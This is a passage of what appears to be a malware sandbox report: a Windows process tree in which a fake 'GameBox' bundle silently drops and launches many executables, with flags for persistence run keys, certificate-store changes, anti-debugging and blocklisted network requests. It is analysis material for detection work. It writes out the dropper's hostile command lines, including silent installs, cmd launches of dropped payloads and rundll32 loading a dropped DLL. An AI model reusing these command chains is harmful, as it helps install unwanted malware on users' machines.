                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                            35⤵
                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping RJMQBVDN -n 30
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:6288
                                                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:360
                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4944
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5128
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4892
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8138472.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8138472.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5880
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7833125.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7833125.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                        PID:5940
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8670546.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8670546.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:6016
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7248847.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7248847.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:6088
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3952
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3156
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4044
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:624
                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274919 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6292
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5112
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-6J27G.tmp\WEATHER Manager.tmp
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-6J27G.tmp\WEATHER Manager.tmp" /SL5="$102DA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  PID:3968
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-O0GC7.tmp\Setup.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-O0GC7.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:5840
                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-O0GC7.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-O0GC7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274919 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5728
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LSCBJ.tmp\MediaBurner2.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LSCBJ.tmp\MediaBurner2.tmp" /SL5="$10352,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4984
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-N13K9.tmp\3377047_logo_media.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-N13K9.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                        PID:5448
                                                                                                                                                                        • C:\Program Files\Windows NT\SSOUTVSYKP\ultramediaburner.exe
                                                                                                                                                                          "C:\Program Files\Windows NT\SSOUTVSYKP\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6148
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-P119B.tmp\ultramediaburner.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-P119B.tmp\ultramediaburner.tmp" /SL5="$3031C,281924,62464,C:\Program Files\Windows NT\SSOUTVSYKP\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              PID:6248
                                                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5836
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\b2-229e6-186-8b385-28cd6cf529126\Gorynesyli.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\b2-229e6-186-8b385-28cd6cf529126\Gorynesyli.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              PID:5324
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\32-962b4-267-20d8e-d746c37cc6361\Lediluwefae.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\32-962b4-267-20d8e-d746c37cc6361\Lediluwefae.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                              PID:508
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0thy4y4d.43o\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7456
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0thy4y4d.43o\GcleanerEU.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\0thy4y4d.43o\GcleanerEU.exe /eufive
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:6984
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4zt14pzn.wio\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:7028
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4zt14pzn.wio\installer.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4zt14pzn.wio\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:5044
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ooiodvp5.oaz\ufgaa.exe & exit
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6872
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vf2thzld.t0t\anyname.exe & exit
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:8356
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vf2thzld.t0t\anyname.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\vf2thzld.t0t\anyname.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:8852
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vf2thzld.t0t\anyname.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\vf2thzld.t0t\anyname.exe" -q
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4464
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wanre313.irr\gcleaner.exe /mixfive & exit
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:8588
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\wanre313.irr\gcleaner.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\wanre313.irr\gcleaner.exe /mixfive
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:2288
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bte3nv5l.nvx\autosubplayer.exe /S & exit
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:8952
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-IE2IG.tmp\VPN.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-IE2IG.tmp\VPN.tmp" /SL5="$102EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            PID:3780
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-7UC86.tmp\Setup.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-7UC86.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5216
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-94064.tmp\Setup.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-94064.tmp\Setup.tmp" /SL5="$A0072,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-7UC86.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                PID:5684
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                      tapinstall.exe remove tap0901
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                      PID:7164
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:7548
                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:4792
                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:7256
                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:9184
                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  PID:6828
                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  PID:6876
                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding CBCDC7C76C80BABA1A7FBFCD2F77D723 C
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:7076
                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding B2724B54138F406A79D37DE8B789BD79 C
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:4716
                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 5675496D5ED5EFAE30FA47290B35B67F
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:6220
                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 725DB9AE3F8B7EAC4E45B475AB408838 C
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                    PID:3556
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                    PID:8528
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      PID:8484
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        PID:2100
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff8520fdec0,0x7ff8520fded0,0x7ff8520fdee0
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:5600
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff69b499e70,0x7ff69b499e80,0x7ff69b499e90
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:9140
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=1740 /prefetch:8
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:5800
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:2
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2524 /prefetch:1
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  PID:7832
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=2168 /prefetch:8
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:3552
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3160 /prefetch:2
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:7808
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=1856 /prefetch:8
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:8604
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=3776 /prefetch:8
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:5672
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=3784 /prefetch:8
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:7144
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=3504 /prefetch:8
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:6744
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,17849886111552193259,14921091758496410822,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2100_393522225" --mojo-platform-channel-handle=2632 /prefetch:8
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:3532
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
